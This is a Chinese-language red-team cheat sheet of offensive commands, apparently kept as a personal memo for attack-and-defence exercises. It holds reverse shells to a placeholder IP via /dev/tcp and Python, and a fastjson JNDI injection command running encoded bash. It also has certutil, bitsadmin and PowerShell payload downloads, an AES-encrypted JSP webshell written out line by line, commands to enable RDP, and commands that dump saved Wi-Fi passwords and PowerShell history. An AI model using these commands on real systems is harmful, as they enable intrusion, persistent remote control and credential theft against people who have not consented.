攻防常用命令
攻防对抗中常用的命令 当作备忘录
certutil powershell探测出网
certutil -urlcache -split -f http://pibfq6603bhlew7kjztwvnepwg26qv.burpcollaborator.net
powershell Invoke-WebRequest "http://aq4xs444jvmwj3831uxpe9cl6cc20r.burpcollaborator.net/"
fastjson执行命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,cGluZyBgd2hvYW1pYC4xZnUwYnguZG5zbG9nLmNu}|{base64,-d}|{bash,-i}" -A "x.x.x.x"
Linux写文件
echo xxxxx== |base64 -d > /var/www/html/1.jsp
Linux反弹shell
bash -i >& /dev/tcp/[ip]/5555 0>&1
exec 5<>/dev/tcp/[ip]/5555;cat <&5|while read line;do $line >&5 2>&1;done
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Linux探测
for i in 192.168.0.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done
Linux查找文件
find / -name passwd
powershell、certutil写文件
certutil编码文件 certutil -encode 1.txt output.txt
certutil解码文件 certutil -decode output.txt input.txt
powershell写入 powershell -c "'xxxxxxxx' | Out-File input.txt -Append"
powershell写入方法2 powershell -c "add-content C:\1.bat -value \"test\""
powershell写入方法2后续(去除换行) powershell "-join((gc -LiteralPath \"c:\1.bat\"))"
windows 2008 开启3389
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
windows下载文件常用命令
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.28.128/payload.txt','payload.exe')
bitsadmin /transfer n http://192.168.28.128/payload.txt C:\Users\administrator\Desktop\1.txt
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php
windows写文件
echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^> >> C:/x/x.jsp
echo ^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^> >> C:/x/x.jsp
echo ^<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> >> C:/x/x.jsp
windows常用的系统变量
查看当前用户目录%HOMEPATH
查看当前目录%CD%
列出用户共享主目录的网络路径%HOMESHARE%
列出有效的当前登录会话的域名控制器名
列出了可执行文件的搜索路径%Path%
列出了处理器的芯片架构%PROCESSOR_ARCHITECTURE%
列出了Program Files文件夹的路径%ProgramFiles%
列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%
列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%
列出了包含用户帐号的域的名字%USERDOMAIN%
列出操作系统目录的位置%WINDIR%
返回“所有用户”配置文件的位置%ALLUSERSPROFILE%
返回处理器数目%NUMBER_OF_PROCESSORS%
powershell地址%PSModulePath%
windows强制停止进程
停止指定pid进程 taskkill /f /pid 3352
停止指定exe taskkill /f /im explor.exe
windows探测
for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl"
for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl">>"c:\a.txt"
for /l %i in (1,1,255) do @ping 192.168.%i.1 -w 1 -n 1 | find /i "ttl"
windows查找文件
dir c:\ /s /b | find "win.ini"
dir c:\ /s /b | find "navicat.exe"
dir c:\ /s /b | find "finalshell.exe"
windows查看历史命令
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type %appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
windows查看计划任务
schtasks /QUERY /fo LIST /v
windows自带压缩、解压缩
windows自带的解压命令 iexpress
windows自带的压缩命令,压缩成啥看自己 zip,rar,cab makecab 1.doc 1.zip
解压命令 expand 1.zip 1.doc
先把要解压的多个文件名写入txt dir /b >>name.txt
压缩 makecab /f name.txt /d maxdisksize=1024000
解压缩 expand 1.cab -f:* c:\test\
windows计算文件hash、设置终端代理
certutil.exe -hashfile 1.txt
windows设置终端代理 set http_proxy=http://127.0.0.1:1080
主机收集
查看rdp链接记录 cmdkey /list
查看dns记录 ipconfig /displaydns
查看arp记录 arp -a
查看在线用户 qwinsta
查看系统的盘符 wmic logicaldisk where DriveType=3 get DeviceID
查看所有用户的sid wmic useraccount get name,sid
windows查看桌面目录 reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /s
查看浏览记录 reg query "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs"
显示系统中的曾经连接过的无线密码
netsh wlan show profiles
查看wifi密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
查看当前系统是否是VMWARE
wmic bios list full | find /i "vmware"
查看当前系统是否有屏保保护,延迟是多少
wmic desktop get screensaversecure,screensavertimeout
查看是否跨网段
Windows:route print
Linux:route
mac:netstat -nr
查看防火墙规则
netsh firewall show config
netsh firewall show state
根据进程查找进程文件
wmic process where name="xxxx.exe" get processid,executablepath,name
wmic process where name="chrome.exe" list full
获取操作系统命令
wmic OS get Caption,CSDVersion,OSArchitecture,Version
